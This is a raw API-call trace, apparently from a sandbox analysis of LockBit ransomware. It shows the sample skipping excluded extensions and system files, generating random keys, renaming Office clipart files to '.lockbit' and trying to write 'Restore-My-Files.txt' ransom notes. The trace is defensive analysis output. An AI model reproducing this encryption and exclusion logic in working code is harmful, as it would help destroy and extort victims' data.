[0150.079] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195254.WMF") returned=".WMF" [0150.079] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.079] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.079] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.079] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.079] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.079] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.079] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.079] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.079] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.079] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.079] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.079] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.079] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.079] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.079] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.079] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.079] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.079] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.079] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.079] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.080] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.080] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.080] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.080] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.080] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.080] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.080] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.080] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.080] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195254.WMF.lockbit") returned 72 [0150.080] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195254.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195254.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0150.081] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.081] malloc (_Size=0x40068) returned 0x3d70450 [0150.081] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=4534) returned 1 [0150.081] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.082] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0150.082] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.082] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0150.082] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0150.088] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195254.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195254.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.088] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.088] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.092] free (_Block=0x1fa2ed8) [0150.092] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195254.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.092] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.092] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.092] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85704600, ftCreationTime.dwHighDateTime=0x1be2705, ftLastAccessTime.dwLowDateTime=0x65fe5b50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x85704600, ftLastWriteTime.dwHighDateTime=0x1be2705, nFileSizeHigh=0x0, nFileSizeLow=0x207a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0195260.WMF", cAlternateFileName="")) returned 1 [0150.092] lstrcmpiW (lpString1=".", lpString2="J0195260.WMF") returned -1 [0150.092] lstrcmpiW (lpString1="..", lpString2="J0195260.WMF") returned -1 [0150.092] PathFindExtensionW (pszPath="J0195260.WMF") returned=".WMF" [0150.092] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.092] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.092] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.093] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.093] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.093] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.093] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.093] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.093] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.093] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.093] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.093] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.093] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.093] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.093] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.093] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.093] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.093] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.093] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.093] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.093] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.093] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.093] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.094] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.094] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.094] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.094] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.094] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.094] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.094] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.094] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.094] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.094] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.094] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.094] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.094] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.094] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.094] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.095] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.095] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.095] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.095] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.095] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.095] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.095] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.095] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.095] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.095] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0195260.WMF") returned 1 [0150.095] lstrcmpiW (lpString1="ntldr", lpString2="J0195260.WMF") returned 1 [0150.095] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0195260.WMF") returned 1 [0150.095] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0195260.WMF") returned -1 [0150.095] lstrcmpiW (lpString1="autorun.inf", lpString2="J0195260.WMF") returned -1 [0150.095] lstrcmpiW (lpString1="thumbs.db", lpString2="J0195260.WMF") returned 1 [0150.095] lstrcmpiW (lpString1="iconcache.db", lpString2="J0195260.WMF") returned -1 [0150.095] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.095] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195260.WMF") returned=".WMF" [0150.095] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.096] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.096] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.096] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.096] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.096] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.096] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.096] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.096] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.096] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.096] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.096] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.096] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.096] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.096] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.096] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.096] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.096] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.096] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.096] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.096] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.097] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.097] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.097] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.097] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.097] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.097] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.097] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.097] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195260.WMF.lockbit") returned 72 [0150.097] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195260.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195260.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0150.098] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.098] malloc (_Size=0x40068) returned 0x3e70008 [0150.098] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=8314) returned 1 [0150.098] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.099] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0150.099] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.100] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0150.100] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0150.105] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195260.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195260.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.105] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.105] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.107] free (_Block=0x1fa2ed8) [0150.107] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195260.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.107] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.107] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.107] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98831600, ftCreationTime.dwHighDateTime=0x1be2705, ftLastAccessTime.dwLowDateTime=0x65fe5b50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x98831600, ftLastWriteTime.dwHighDateTime=0x1be2705, nFileSizeHigh=0x0, nFileSizeLow=0x72f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0195320.WMF", cAlternateFileName="")) returned 1 [0150.107] lstrcmpiW (lpString1=".", lpString2="J0195320.WMF") returned -1 [0150.107] lstrcmpiW (lpString1="..", lpString2="J0195320.WMF") returned -1 [0150.107] PathFindExtensionW (pszPath="J0195320.WMF") returned=".WMF" [0150.107] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.107] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.107] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.107] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.107] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.107] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.107] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.107] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.107] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.108] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.108] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.108] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.108] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.108] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.108] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.108] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.108] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.108] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.108] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.108] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.108] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.108] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.108] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.108] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.108] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.108] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.108] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.108] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.108] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.109] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.109] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.109] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.109] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.109] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.109] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.109] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.109] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.109] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.109] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.109] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.109] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.109] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.109] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.109] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.109] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.109] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.109] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.109] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0195320.WMF") returned 1 [0150.110] lstrcmpiW (lpString1="ntldr", lpString2="J0195320.WMF") returned 1 [0150.110] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0195320.WMF") returned 1 [0150.110] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0195320.WMF") returned -1 [0150.110] lstrcmpiW (lpString1="autorun.inf", lpString2="J0195320.WMF") returned -1 [0150.110] lstrcmpiW (lpString1="thumbs.db", lpString2="J0195320.WMF") returned 1 [0150.110] lstrcmpiW (lpString1="iconcache.db", lpString2="J0195320.WMF") returned -1 [0150.110] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.110] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195320.WMF") returned=".WMF" [0150.110] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.110] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.110] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.110] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.110] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.110] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.110] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.110] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.110] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.110] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.110] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.110] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.111] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.111] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.111] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.111] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.111] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.111] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.111] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.111] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.111] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.111] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.111] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.111] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.111] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.111] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.111] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.111] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.111] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195320.WMF.lockbit") returned 72 [0150.111] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195320.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195320.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0150.117] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.117] malloc (_Size=0x40068) returned 0x3df0008 [0150.117] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=29432) returned 1 [0150.117] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.118] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0150.118] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.118] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0150.118] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0150.121] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195320.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195320.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.121] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.121] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.123] free (_Block=0x1fa2ed8) [0150.123] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195320.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.123] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.123] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.123] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9338c00, ftCreationTime.dwHighDateTime=0x1be2705, ftLastAccessTime.dwLowDateTime=0x65fe5b50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa9338c00, ftLastWriteTime.dwHighDateTime=0x1be2705, nFileSizeHigh=0x0, nFileSizeLow=0x5350, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0195342.WMF", cAlternateFileName="")) returned 1 [0150.123] lstrcmpiW (lpString1=".", lpString2="J0195342.WMF") returned -1 [0150.123] lstrcmpiW (lpString1="..", lpString2="J0195342.WMF") returned -1 [0150.123] PathFindExtensionW (pszPath="J0195342.WMF") returned=".WMF" [0150.123] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.123] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.123] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.123] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.123] lstrcmpiW (lpString1=".adv", 